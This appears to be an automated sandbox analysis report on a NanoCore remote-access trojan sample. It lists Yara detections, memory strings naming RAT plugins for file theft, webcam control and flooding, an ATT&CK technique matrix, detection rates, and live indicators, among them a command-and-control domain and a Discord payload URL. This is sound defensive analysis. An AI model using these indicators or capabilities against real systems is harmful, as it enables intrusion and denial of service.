            Source: Yara matchFile source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522346624.0000000003CE7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Detected Nanocore RatShow sources
            Source: s9SWgUgyO5.exe, 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
            Source: svchost.exe, 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: svchost.exe, 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.515373653.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522346624.0000000003CE7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211Input Capture21File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder11Process Injection112Obfuscated Files or Information2LSASS MemorySystem Information Discovery22Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder11Software Packing1Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSecurity Software Discovery341Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion141Cached Domain CredentialsVirtualization/Sandbox Evasion141VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 491708 Sample: s9SWgUgyO5.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 75 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 9 other signatures 2->81 7 s9SWgUgyO5.exe 18 6 2->7         started        12 svchost.exe 2->12         started        14 svchost.exe 2->14         started        16 10 other processes 2->16 process3 dnsIp4 67 cdn.discordapp.com 162.159.133.233, 443, 49736, 49742 CLOUDFLARENETUS United States 7->67 69 192.168.2.1 unknown unknown 7->69 61 C:\Users\Public\Documents\...\svchost.exe, PE32 7->61 dropped 63 C:\Users\...\svchost.exe:Zone.Identifier, ASCII 7->63 dropped 85 Creates autostart registry keys with suspicious names 7->85 87 Adds a directory exclusion to Windows Defender 7->87 89 Hides threads from debuggers 7->89 91 Drops PE files with benign system names 7->91 18 s9SWgUgyO5.exe 7->18         started        23 WerFault.exe 7->23         started        25 powershell.exe 25 7->25         started        31 2 other processes 7->31 93 System process connects to network (likely due to code injection or exploit) 12->93 95 Multi AV Scanner detection for dropped file 12->95 97 Machine Learning detection for dropped file 12->97 27 powershell.exe 12->27         started        29 powershell.exe 12->29         started        33 2 other processes 12->33 71 162.159.130.233, 443, 49748 CLOUDFLARENETUS United States 14->71 35 4 other processes 14->35 73 127.0.0.1 unknown unknown 16->73 99 Changes security center settings (notifications, updates, antivirus, firewall) 16->99 37 4 other processes 16->37 file5 signatures6 process7 dnsIp8 65 friomo.duckdns.org 194.147.140.25, 49741, 49746, 49750 PTPEU unknown 18->65 57 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->57 dropped 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->83 59 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 23->59 dropped 39 conhost.exe 25->39         started        41 conhost.exe 27->41         started        43 conhost.exe 29->43         started        45 conhost.exe 31->45         started        47 conhost.exe 31->47         started        49 conhost.exe 33->49         started        51 conhost.exe 35->51         started        55 2 other processes 35->55 53 conhost.exe 37->53         started        file9 signatures10 process11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            s9SWgUgyO5.exe26%MetadefenderBrowse
            s9SWgUgyO5.exe36%ReversingLabsByteCode-MSIL.Trojan.Woreflint
            s9SWgUgyO5.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\Documents\???????????????\svchost.exe100%Joe Sandbox ML
            C:\Users\Public\Documents\???????????????\svchost.exe26%MetadefenderBrowse
            C:\Users\Public\Documents\???????????????\svchost.exe36%ReversingLabsByteCode-MSIL.Trojan.Woreflint

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            10.2.s9SWgUgyO5.exe.60a0000.20.unpack100%AviraTR/NanoCore.fadteDownload File
            10.2.s9SWgUgyO5.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.ver)0%Avira URL Cloudsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            https://dynamic.t0%URL Reputationsafe
            https://%s.dnet.xboxlive.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cdn.discordapp.com
            162.159.133.233
            truefalse
              high
              friomo.duckdns.org
              194.147.140.25
              truefalse
                high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/886962207051640872/890689205934620692/4102A6C4.jpgfalse
                  high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                    high
                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000003.320668610.00000184E6E56000.00000004.00000001.sdmpfalse
                      high
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000015.00000002.321257361.00000184E6E5C000.00000004.00000001.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000015.00000003.320632083.00000184E6E46000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpfalse
                                  high
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000015.00000003.291332934.00000184E6E31000.00000004.00000001.sdmpfalse
                                    high
                                    https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpfalse
                                      high
                                      http://crl.ver)svchost.exe, 00000009.00000002.515319906.000002207E663000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000015.00000003.317511833.00000184E6E5D000.00000004.00000001.sdmpfalse
                                        high
                                        https://cdn.discordapp.coms9SWgUgyO5.exe, 00000000.00000000.282547862.0000000002EC1000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.368578421.0000000002AA1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.383088847.0000000003211000.00000004.00000001.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000015.00000002.321159443.00000184E6E13000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000015.00000002.321223246.00000184E6E42000.00000004.00000001.sdmpfalse
                                              high
                                              http://google.coms9SWgUgyO5.exe, 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmpfalse
                                                high
                                                https://%s.xboxlive.comsvchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                low
                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000003.320632083.00000184E6E46000.00000004.00000001.sdmpfalse
                                                  high
